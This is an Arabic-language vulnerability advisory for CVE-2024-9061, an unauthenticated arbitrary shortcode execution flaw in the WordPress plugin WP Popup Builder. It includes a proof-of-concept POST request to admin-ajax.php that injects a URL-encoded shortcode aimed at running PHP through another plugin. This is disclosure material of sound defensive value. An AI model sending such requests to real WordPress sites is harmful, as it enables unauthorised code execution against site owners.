
WP Popup Builder – نماذج البوب أب وتوليد العملاء المحتملين للتسويق <= 1.3.5 - تنفيذ شورت كود عشوائي بدون مصادقة عبر wp_ajax_nopriv_shortcode_Api_Add
WP Popup Builder – Popup Forms and Marketing Lead Generation <= 1.3.5 - تنفيذ Shortcode تعسفي بدون مصادقة عبر wp_ajax_nopriv_shortcode_Api_Add
تعد إضافة WP Popup Builder – Popup Forms and Marketing Lead Generation لمنصة ووردبريس عرضة لتنفيذ shortcode تعسفي عبر إجراء AJAX wp_ajax_nopriv_shortcode_Api_Add في جميع الإصدارات حتى 1.3.5 ضمنًا. يعود السبب إلى أن البرنامج يسمح للمستخدمين بتنفيذ إجراء لا يتحقق من قيمة ما بشكل صحيح قبل تشغيل do_shortcode، مما يتيح للمهاجمين غير المصادق عليهم تنفيذ shortcodes تعسفية. ملاحظة: تم إصلاح هذه الثغرة جزئيًا في الإصدار 1.3.5 عبر فحص nonce، وهو ما منع الوصول إلى الدالة المتأثرة بشكل فعّال. غير أن الإصدار 1.3.6 يتضمن فحص التفويض الصحيح لمنع الوصول غير المصرح به.
كان لدي إضافة أخرى مثبتة لتنفيذ PHP لهذا الغرض، لكنني لم أتمكن أبدًا من جعلها تنفذ.
[xyz-ips snippet="test"]
Type: plugin
CVSS Score: 7.3
CVE: CVE-2024-9061
Slug: wp-popup-builder
Download Link: Download [wp-popup-builder Version 1.3.2](https://downloads.wordpress.org/plugin/wp-popup-builder.1.3.2.zip)
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: curl/8.7.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Connection: keep-alive
action=shortcode_Api_Add&shortcode=%5b%78%79%7a%2d%69%70%73%20%73%6e%69%70%70%65%74%3d%22%74%65%73%74%22%5d
الاستجابة عبارة عن 200 فارغة.